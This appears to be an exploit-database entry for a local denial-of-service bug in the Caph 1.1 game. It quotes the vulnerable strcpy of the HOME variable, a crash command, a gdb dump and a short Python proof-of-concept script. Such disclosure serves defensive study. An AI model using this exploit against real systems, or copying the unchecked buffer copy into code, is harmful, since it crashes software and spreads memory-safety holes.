Caph 1.1 Local Denial Of Service



EKU-ID: 5989 CVE: OSVDB-ID:
Author: N_A Published: 2016-11-04 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home


# Caph DOS Exploit by N_A . Crashes the program and produces a segmentation fault
# Tested upon Kali Linux.
# Discovered by N_A , N_A [at] tutanota.com



# Description
# ============

# It is a sandbox game, based on physics. The game aim is to make contact red object with green object. 
# You can use various objects, solid, wire (rope), and bendable objects. Gravitation will help you.

# https://sourceforge.net/projects/caphgame



# Vulnerability
# ==============

# Caph suffers from a buffer over flow vulnerability that crashes the program. The 'HOME' environment
# variable can be abused to produce an over flow.A  The subsequent details are below:

# in file caph.c
# static const char *
# sys_get_config()
# {
#A A A A A A A  static char dir[256];
#A A A A A A A  const char *home;

# #if defined(_WIN32)
#A A A A A A A  strcpy(dir, DATA_CONFIG);
#A A A A A A A  return dir;
# #else
#A A A A A A A  home = getenv("HOME");
#
#A A A A A A A  if (home)
#A A A A A A A A A A A A A A A  strcpy(dir, home);


# The sys_get_config() function is called again in main() and an overflow can be produced , as per below:

# NA@kali:~/caph-1.1/src$ export HOME=`perl -e 'print"A"x5000'`
# NA@kali:/home/NAcaph-1.1/src$ ./caph
# Segmentation fault





# gdb caph
# GNU gdb (Debian 7.11.1-2) 7.11.1
# Copyright (C) 2016 Free Software Foundation, Inc.
# License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
# This is free software: you are free to change and redistribute it.
# There is NO WARRANTY, to the extent permitted by law.A  Type "show copying"
# and "show warranty" for details.
# This GDB was configured as "i686-linux-gnu".
# Type "show configuration" for configuration details.
# For bug reporting instructions, please see:
# <http://www.gnu.org/software/gdb/bugs>.
# Find the GDB manual and other documentation resources online at:
# <http://www.gnu.org/software/gdb/documentation>.
# For help, type "help".
# Type "apropos word" to search for commands related to "word"...
# Reading symbols from caph...done.
# (gdb) r
# Starting program: /home/NA/caph-1.1/src/caph 
# [Thread debugging using libthread_db enabled]
# Using host libthread_db library "/lib/i386-linux-gnu/libthread_db.so.1".
# *** Error in `/home/NA/caph-1.1/src/caph': free(): invalid next size (normal): 0x08053028 ***
# ======= Backtrace: =========
# /lib/i386-linux-gnu/libc.so.6(+0x66677)[0xb7cc8677]
# /lib/i386-linux-gnu/libc.so.6(+0x6c627)[0xb7cce627]
# /lib/i386-linux-gnu/libc.so.6(+0x6cdd1)[0xb7ccedd1]
# /lib/i386-linux-gnu/libc.so.6(+0x5d7cd)[0xb7cbf7cd]
# /lib/i386-linux-gnu/libc.so.6(fopen+0x1e)[0xb7cbf7fe]
# /home/Nassar/newtest/caph-1.1/src/caph(main+0x196)[0x8049656]
# /lib/i386-linux-gnu/libc.so.6(__libc_start_main+0xf7)[0xb7c7a5f7]
# /home/NA/caph-1.1/src/caph[0x804a6c4]
# ======= Memory map: ========
# 08048000-08052000 r-xp 00000000 08:05 1709919A A A  /home/NA/caph-1.1/src/caph
# 08052000-08053000 rw-p 00009000 08:05 1709919A A A  /home/NA/caph-1.1/src/caph
# 08053000-08074000 rw-p 00000000 00:00 0A A A A A A A A A  [heap]
# b6f00000-b6f21000 rw-p 00000000 00:00 0 
# b6f21000-b7000000 ---p 00000000 00:00 0 
# b704b000-b704f000 rw-p 00000000 00:00 0 
# b704f000-b707a000 r-xp 00000000 08:05 1708986A A A  /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8
# b707a000-b707b000 r--p 0002a000 08:05 1708986A A A  /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8
# b707b000-b707c000 rw-p 0002b000 08:05 1708986A A A  /usr/lib/i386-linux-gnu/libvorbis.so.0.4.8
# b707c000-b7083000 r-xp 00000000 08:05 1708466A A A  /usr/lib/i386-linux-gnu/libogg.so.0.8.2
# b7083000-b7084000 r--p 00006000 08:05 1708466A A A  /usr/lib/i386-linux-gnu/libogg.so.0.8.2
# b7084000-b7085000 rw-p 00007000 08:05 1708466A A A  /usr/lib/i386-linux-gnu/libogg.so.0.8.2
# b7085000-b7086000 rw-p 00000000 00:00 0 
# b7086000-b709a000 r-xp 00000000 08:05 263412A A A A  /lib/i386-linux-gnu/libgpg-error.so.0.17.0
# b709a000-b709b000 r--p 00013000 08:05 263412A A A A  /lib/i386-linux-gnu/libgpg-error.so.0.17.0
# b709b000-b709c000 rw-p 00014000 08:05 263412A A A A  /lib/i386-linux-gnu/libgpg-error.so.0.17.0
# b709c000-b7113000 r-xp 00000000 08:05 279321A A A A  /lib/i386-linux-gnu/libpcre.so.3.13.3
# b7113000-b7114000 r--p 00076000 08:05 279321A A A A  /lib/i386-linux-gnu/libpcre.so.3.13.3
# b7114000-b7115000 rw-p 00077000 08:05 279321A A A A  /lib/i386-linux-gnu/libpcre.so.3.13.3
# b7115000-b7129000 r-xp 00000000 08:05 263327A A A A  /lib/i386-linux-gnu/libresolv-2.23.so
# b7129000-b712a000 r--p 00013000 08:05 263327A A A A  /lib/i386-linux-gnu/libresolv-2.23.so
# b712a000-b712b000 rw-p 00014000 08:05 263327A A A A  /lib/i386-linux-gnu/libresolv-2.23.so
# b712b000-b712d000 rw-p 00000000 00:00 0 
# b712d000-b71a7000 r-xp 00000000 08:05 1708599A A A  /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11
# b71a7000-b71b8000 r--p 00079000 08:05 1708599A A A  /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11
# b71b8000-b71b9000 rw-p 0008a000 08:05 1708599A A A  /usr/lib/i386-linux-gnu/libvorbisenc.so.2.0.11
# b71b9000-b7218000 r-xp 00000000 08:05 1707230A A A  /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0
# b7218000-b7219000 r--p 0005e000 08:05 1707230A A A  /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0
# b7219000-b721a000 rw-p 0005f000 08:05 1707230A A A  /usr/lib/i386-linux-gnu/libFLAC.so.8.3.0
# b721a000-b721b000 rw-p 00000000 00:00 0 
# b721b000-b7231000 r-xp 00000000 08:05 263312A A A A  /lib/i386-linux-gnu/libnsl-2.23.so
# b7231000-b7232000 ---p 00016000 08:05 263312A A A A  /lib/i386-linux-gnu/libnsl-2.23.so
# b7232000-b7233000 r--p 00016000 08:05 263312A A A A  /lib/i386-linux-gnu/libnsl-2.23.so
# b7233000-b7234000 rw-p 00017000 08:05 263312A A A A  /lib/i386-linux-gnu/libnsl-2.23.so
# b7234000-b7236000 rw-p 00000000 00:00 0 
# b7236000-b7252000 r-xp 00000000 08:05 263406A A A A  /lib/i386-linux-gnu/libgcc_s.so.1
# b7252000-b7253000 rw-p 0001b000 08:05 263406A A A A  /lib/i386-linux-gnu/libgcc_s.so.1
# b7253000-b731c000 r-xp 00000000 08:05 263313A A A A  /lib/i386-linux-gnu/libgcrypt.so.20.1.2
# b731c000-b731d000 ---p 000c9000 08:05 263313A A A A  /lib/i386-linux-gnu/libgcrypt.so.20.1.2
# b731d000-b731e000 r--p 000c9000 08:05 263313A A A A  /lib/i386-linux-gnu/libgcrypt.so.20.1.2
# b731e000-b7321000 rw-p 000ca000 08:05 263313A A A A  /lib/i386-linux-gnu/libgcrypt.so.20.1.2
# b7321000-b734b000 r-xp 00000000 08:05 279325A A A A  /lib/i386-linux-gnu/liblzma.so.5.2.2
# b734b000-b734c000 r--p 00029000 08:05 279325A A A A  /lib/i386-linux-gnu/liblzma.so.5.2.2
# b734c000-b734d000 rw-p 0002a000 08:05 279325A A A A  /lib/i386-linux-gnu/liblzma.so.5.2.2
# b734d000-b7370000 r-xp 00000000 08:05 263511A A A A  /lib/i386-linux-gnu/libselinux.so.1
# b7370000-b7371000 r--p 00022000 08:05 263511A A A A  /lib/i386-linux-gnu/libselinux.so.1
# b7371000-b7372000 rw-p 00023000 08:05 263511A A A A  /lib/i386-linux-gnu/libselinux.so.1
# b7372000-b7374000 rw-p 00000000 00:00 0 
# b7374000-b7385000 r-xp 00000000 08:05 1707416A A A  /usr/lib/i386-linux-gnu/libXi.so.6.1.0
# b7385000-b7386000 r--p 00010000 08:05 1707416A A A  /usr/lib/i386-linux-gnu/libXi.so.6.1.0
# b7386000-b7387000 rw-p 00011000 08:05 1707416A A A  /usr/lib/i386-linux-gnu/libXi.so.6.1.0
# b7387000-b738b000 r-xp 00000000 08:05 263540A A A A  /lib/i386-linux-gnu/libuuid.so.1.3.0
# b738b000-b738c000 r--p 00003000 08:05 263540A A A A  /lib/i386-linux-gnu/libuuid.so.1.3.0
# b738c000-b738d000 rw-p 00004000 08:05 263540A A A A  /lib/i386-linux-gnu/libuuid.so.1.3.0
# b738d000-b7392000 r-xp 00000000 08:05 1707484A A A  /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1
# b7392000-b7393000 r--p 00004000 08:05 1707484A A A  /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1
# b7393000-b7394000 rw-p 00005000 08:05 1707484A A A  /usr/lib/i386-linux-gnu/libasyncns.so.0.3.1
# b7394000-b7406000 r-xp 00000000 08:05 1708754A A A  /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25
# b7406000-b7407000 ---p 00072000 08:05 1708754A A A  /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25
# b7407000-b7408000 r--p 00072000 08:05 1708754A A A  /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25
# b7408000-b7409000 rw-p 00073000 08:05 1708754A A A  /usr/lib/i386-linux-gnu/libsndfile.so.1.0.25
# b7409000-b740d000 rw-p 00000000 00:00 0 
# b740d000-b7415000 r-xp 00000000 08:05 263542A A A A  /lib/i386-linux-gnu/libwrap.so.0.7.6
# b7415000-b7416000 r--p 00007000 08:05 263542A A A A  /lib/i386-linux-gnu/libwrap.so.0.7.6
# b7416000-b7417000 rw-p 00008000 08:05 263542A A A A  /lib/i386-linux-gnu/libwrap.so.0.7.6
# b7417000-b7418000 rw-p 00000000 00:00 0 
# b7418000-b74a0000 r-xp 00000000 08:05 263522A A A A  /lib/i386-linux-gnu/libsystemd.so.0.13.0
# b74a0000-b74a1000 ---p 00088000 08:05 263522A A A A  /lib/i386-linux-gnu/libsystemd.so.0.13.0
# b74a1000-b74a3000 r--p 00088000 08:05 263522A A A A  /lib/i386-linux-gnu/libsystemd.so.0.13.0
# b74a3000-b74a4000 rw-p 0008a000 08:05 263522A A A A  /lib/i386-linux-gnu/libsystemd.so.0.13.0
# b74a4000-b74aa000 r-xp 00000000 08:05 1707439A A A  /usr/lib/i386-linux-gnu/libXtst.so.6.1.0
# b74aa000-b74ab000 r--p 00005000 08:05 1707439A A A  /usr/lib/i386-linux-gnu/libXtst.so.6.1.0
# b74ab000-b74ac000 rw-p 00006000 08:05 1707439A A A  /usr/lib/i386-linux-gnu/libXtst.so.6.1.0
# b74ac000-b74b4000 r-xp 00000000 08:05 1707375A A A  /usr/lib/i386-linux-gnu/libSM.so.6.0.1
# b74b4000-b74b5000 r--p 00007000 08:05 1707375A A A  /usr/lib/i386-linux-gnu/libSM.so.6.0.1
# b74b5000-b74b6000 rw-p 00008000 08:05 1707375A A A  /usr/lib/i386-linux-gnu/libSM.so.6.0.1
# b74b6000-b74cf000 r-xp 00000000 08:05 1707248A A A  /usr/lib/i386-linux-gnu/libICE.so.6.3.0
# b74cf000-b74d0000 r--p 00018000 08:05 1707248A A A  /usr/lib/i386-linux-gnu/libICE.so.6.3.0
# b74d0000-b74d1000 rw-p 00019000 08:05 1707248A A A  /usr/lib/i386-linux-gnu/libICE.so.6.3.0
# b74d1000-b74d3000 rw-p 00000000 00:00 0 
# b74d3000-b74d8000 r-xp 00000000 08:05 1707406A A A  /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0
# b74d8000-b74d9000 r--p 00004000 08:05 1707406A A A  /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0
# b74d9000-b74da000 rw-p 00005000 08:05 1707406A A A  /usr/lib/i386-linux-gnu/libXdmcp.so.6.0.0
# b74da000-b74db000 rw-p 00000000 00:00 0 
# b74db000-b74dd000 r-xp 00000000 08:05 1707393A A A  /usr/lib/i386-linux-gnu/libXau.so.6.0.0
# b74dd000-b74de000 r--p 00001000 08:05 1707393A A A  /usr/lib/i386-linux-gnu/libXau.so.6.0.0
# b74de000-b74df000 rw-p 00002000 08:05 1707393A A A  /usr/lib/i386-linux-gnu/libXau.so.6.0.0
# b74df000-b74ff000 r-xp 00000000 08:05 277202A A A A  /lib/i386-linux-gnu/libtinfo.so.5.9
# b74ff000-b7501000 r--p 0001f000 08:05 277202A A A A  /lib/i386-linux-gnu/libtinfo.so.5.9
# b7501000-b7502000 rw-p 00021000 08:05 277202A A A A  /lib/i386-linux-gnu/libtinfo.so.5.9
# b7502000-b7535000 r-xp 00000000 08:05 263441A A A A  /lib/i386-linux-gnu/libncursesw.so.5.9
# b7535000-b7536000 r--p 00032000 08:05 263441A A A A  /lib/i386-linux-gnu/libncursesw.so.5.9
# b7536000-b7537000 rw-p 00033000 08:05 263441A A A A  /lib/i386-linux-gnu/libncursesw.so.5.9
# b7537000-b7628000 r-xp 00000000 08:05 263430A A A A  /lib/i386-linux-gnu/libslang.so.2.3.0
# b7628000-b762b000 r--p 000f0000 08:05 263430A A A A  /lib/i386-linux-gnu/libslang.so.2.3.0
# b762b000-b763a000 rw-p 000f3000 08:05 263430A A A A  /lib/i386-linux-gnu/libslang.so.2.3.0
# b763a000-b7669000 rw-p 00000000 00:00 0 
# b7669000-b76c2000 r-xp 00000000 08:05 263384A A A A  /lib/i386-linux-gnu/libdbus-1.so.3.14.6
# b76c2000-b76c3000 r--p 00058000 08:05 263384A A A A  /lib/i386-linux-gnu/libdbus-1.so.3.14.6
# b76c3000-b76c4000 rw-p 00059000 08:05 263384A A A A  /lib/i386-linux-gnu/libdbus-1.so.3.14.6
# .....
# .....
# .....

# Program received signal SIGABRT, Aborted.
# 0xb7fdac38 in __kernel_vsyscall ()
# (gdb) 








import os

def banner():
A A A  print('==========================')
A A A  print('Local Caph DOS Exploit')
A A A  print()
A A A  print('\tby N_A')
A A A  print('==========================')
A A A  print()

banner()
buffer = "\x41" * 5000
os.environ['HOME'] = str(buffer)
os.system('./caph') #make sure the exploit is in the same directory as caph



--
Securely sent with Tutanota. Claim your encrypted mailbox today!
https://tutanota.com